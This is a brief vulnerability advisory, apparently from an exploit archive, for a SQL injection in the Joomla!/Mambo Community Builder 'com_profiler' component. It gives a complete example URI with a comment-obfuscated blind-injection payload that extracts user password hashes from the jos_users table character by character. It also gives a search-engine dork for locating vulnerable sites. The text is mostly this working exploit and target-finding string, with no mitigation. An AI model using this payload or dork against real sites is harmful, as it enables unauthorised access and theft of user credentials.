Joomla! and Mambo Community Builder 'com_profiler' Component SQL Injection Vulnerability

Joomla! and Mambo Community Builder 'com_profiler' Component SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*


Dork:       inurl: "com_comprofiler"